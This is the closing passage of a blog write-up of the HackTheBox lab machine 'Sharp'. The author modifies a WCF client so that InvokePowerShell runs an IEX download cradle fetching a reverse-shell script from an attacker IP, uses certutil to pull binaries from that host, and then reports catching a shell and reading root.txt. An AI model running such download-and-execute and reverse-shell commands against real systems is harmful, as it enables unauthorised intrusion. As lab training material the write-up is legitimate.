C:\Users\lars\Documents\wcf -DestinationPath C:\Users\lars\Documents\wcf . zip </code><p>read about compress archive <a href="https://blog.netwrix.com/2018/11/06/using-powershell-to-create-zip-archives-and-unzip-files/">here</a> lets transfer it to dev share as lars has access to it</p>><code class="language-cmd"> PS C:\Users\lars\Documents&gt; Move-Item -Path C:\Users\lars\Documents\wcf.zip -Destination C:\dev </code><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/32.png" alt="Desktop View" /></p><p>Download it now</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/33.png" alt="Desktop View" /></p><p>we have sln file lets open it using visual studio</p><p><strong>Client:</strong> it’s using 8889 port to communicate.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/34.png" alt="Desktop View" /></p><p>also there is invokepowershell method looks intresting <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/35.png" alt="Desktop View" /></p><p>i can add reverse shell in it and i can run it using invokepowershell in client main method</p><div class="language-cs highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="c1">// reverse shell</span>
<span class="n">Console</span><span class="p">.</span><span class="nf">WriteLine</span><span class="p">(</span><span class="n">client</span><span class="p">.</span><span class="nf">InvokePowerShell</span><span class="p">(</span><span class="s">"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.156:80/rootshell.ps1')"</span><span class="p">));</span>
</pre></table></code></div></div><p><strong>Shell</strong> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/36.png" alt="Desktop View" /></p><p>let’s build it <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/37.png" alt="Desktop View" /></p><p>now i have to send wcfclient.exe to lars but i cant send it through file-explorer</p><p>we can use this windows utility <a href="https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/">link</a> start python server at port 80</p><div class="language-powershell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="n">PS</span><span class="w"> </span><span class="nx">C:\dev</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">certutil</span><span class="w"> </span><span class="nt">-urlcache</span><span class="w"> </span><span class="o">-split</span><span class="w"> </span><span class="nt">-f</span><span class="w"> </span><span class="nx">http://10.10.14.156:80/WcfRemotingLibrary.dll</span><span class="w"> </span><span class="nx">WcfRemotingLibrary.dll</span><span class="w">
</span><span class="o">****</span><span class="w">  </span><span class="n">Online</span><span class="w">  </span><span class="o">****</span><span class="w">
  </span><span class="mi">0000</span><span class="w">  </span><span class="o">...</span><span class="w">
  </span><span class="mi">1</span><span class="n">e00</span><span class="w">
</span><span class="nx">CertUtil:</span><span class="w"> </span><span class="nt">-URLCache</span><span class="w"> </span><span class="nx">command</span><span class="w"> </span><span class="nx">completed</span><span class="w"> </span><span class="nx">successfully.</span><span class="w">
</span><span class="n">PS</span><span class="w"> </span><span class="nx">C:\dev</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">certutil</span><span class="w"> </span><span class="nt">-urlcache</span><span class="w"> </span><span class="o">-split</span><span class="w"> </span><span class="nt">-f</span><span class="w"> </span><span class="nx">http://10.10.14.156:80/WcfClient.exe</span><span class="w">  </span><span class="nx">WcfClient.exe</span><span class="w">
</span><span class="o">****</span><span class="w">  </span><span class="n">Online</span><span class="w">  </span><span class="o">****</span><span class="w">
  </span><span class="mi">0000</span><span class="w">  </span><span class="o">...</span><span class="w">
  </span><span class="mi">1600</span><span class="w">
</span><span class="n">CertUtil:</span><span class="w"> </span><span class="nt">-URLCache</span><span class="w"> </span><span class="nx">command</span><span class="w"> </span><span class="nx">completed</span><span class="w"> </span><span class="nx">successfully.</span><span class="w">

</span></pre></table></code></div></div><p>lets move it to documents folder</p><div class="language-ps highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="nf">Move-Item</span> <span class="nf">-Path</span> <span class="nf">WcfRemotingLibrary.dll</span> <span class="nf">-Destination</span> <span class="nf">C:\Users\lars\Documents</span>

<span class="nf">Move-Item</span> <span class="nf">-Path</span> <span class="nf">WcfClient.exe</span> <span class="nf">-Destination</span> <span class="nf">C:\Users\lars\Documents</span>

</pre></table></code></div></div><p>then start your netcat listener</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/38.png" alt="Desktop View" /> <br /> python server</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/39.png" alt="Desktop View" /></p><p>lets run wcfclient now <br /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/40.png" alt="Desktop View" /></p><p>Response at python server</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/41.png" alt="Desktop View" /></p><p>I got shell</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/42.png" alt="Desktop View" /></p><p>root.txt</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/43.png" alt="Desktop View" /></p><p>Thank you for reading my blog if you have any suggestions feel free to contact me on <a href="https://twitter.com/softwareuser_">twitter</a>.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>hackthebox</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/htb-machines/" class="post-tag no-text-decoration" >htb-machines</a> <a href="/tags/htb/" class="post-tag no-text-decoration" >htb</a> <a href="/tags/sharp/" class="post-tag no-text-decoration" >sharp</a> <a href="/tags/portable-kanban/" class="post-tag no-text-decoration" >portable-kanban</a> <a href="/tags/kanban/" class="post-tag no-text-decoration" >kanban</a> <a href="/tags/reversing/" class="post-tag no-text-decoration" >reversing</a> <a href="/tags/exploit-remoting-service/" class="post-tag no-text-decoration" >exploit-remoting-service</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Sharp HackTheBox Writeup - SoftwareUser&url=https://softwareuser23.github.io/posts/writeup-sharp/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Sharp HackTheBox Writeup - SoftwareUser&u=https://softwareuser23.github.io/posts/writeup-sharp/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Sharp HackTheBox Writeup - SoftwareUser&url=https://softwareuser23.github.io/posts/writeup-sharp/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/writeup-academy/">Writeup Academy</a></li><li><a href="/posts/writeup-doctor/">Writeup Doctor</a></li><li><a href="/posts/the-art-of-gaining-root/">The Art Of Gaining Root</a></li><li><a href="/posts/writeup-compromised/">Compromised Machine</a></li></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/htb/">htb</a> <a class="post-tag" href="/tags/htb-machines/">htb machines</a> <a class="post-tag" href="/tags/ssti/">ssti</a> <a class="post-tag" href="/tags/sharp/">sharp</a> <a class="post-tag" href="/tags/root-shell/">root shell</a> <a class="post-tag" href="/tags/root/">root</a> <a class="post-tag" href="/tags/reversing/">reversing</a> <a class="post-tag" href="/tags/privesc/">privesc</a> <a class="post-tag" href="/tags/portable-kanban/">portable kanban</a> <a class="post-tag" href="/tags/nmap/">nmap</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/the-art-of-gaining-root/" class="btn btn-outline-primary"><p>The Art Of Gaining Root</p></a> <span class="btn btn-outline-primary disabled"><p>-</p></span></div><!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-4 mb-2 mb-sm-4 pb-2"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/writeup-doctor/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Feb 13 <i class="unloaded">2021-02-13T14:01:00+05:30</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Writeup Doctor</h3><div class="text-muted small"><p> Introduction Doctor is easy level machine released on 26 September 2020 on HacTheBox and created by egotisticalSW The blog is for educational purposes only. Enumeration IP-: 10.10.10.209 ...</p></div></div></a></div><div class="card"> <a href="/posts/writeup-academy/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Mar 13 <i class="unloaded">2021-03-13T14:01:00+05:30</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Writeup Academy</h3><div class="text-muted small"><p> Introduction Academy is easy level machine released on 07 November 2020 on HacTheBox and created by egre55 and mrb3n The blog is for educational purposes only. Enumeration IP-: 10.10.10...</p></div></div></a></div><div class="card"> <a href="/posts/writeup-compromised/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Feb 4 <i class="unloaded">2021-02-04T14:01:00+05:30</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Compromised Machine</h3><div class="text-muted small"><p> Introduction Compromised machine released on 12 Sep 2020 on Hackthebox and created by D4nch3n The blog is for educational purposes only. Enumeration IP-: 10.10.10.207 As always, I ad...</p></div></div></a></div></div></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2021 <a href="https://twitter.com/softwareuser_">Software User</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/">Chirpy</a> theme.</p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/htb/">htb</a> <a class="post-tag" href="/tags/htb-machines/">htb machines</a> <a class="post-tag" href="/tags/ssti/">ssti</a> <a class="post-tag" href="/tags/sharp/">sharp</a> <a class="post-tag" href="/tags/root-shell/">root shell</a> <a class="post-tag" href="/tags/root/">root</a> <a class="post-tag" href="/tags/reversing/">reversing</a> <a class="post-tag" href="/tags/privesc/">privesc</a> <a class="post-tag" href="/tags/portable-kanban/">portable kanban</a> <a class="post-tag" href="/tags/nmap/">nmap</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://softwareuser23.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
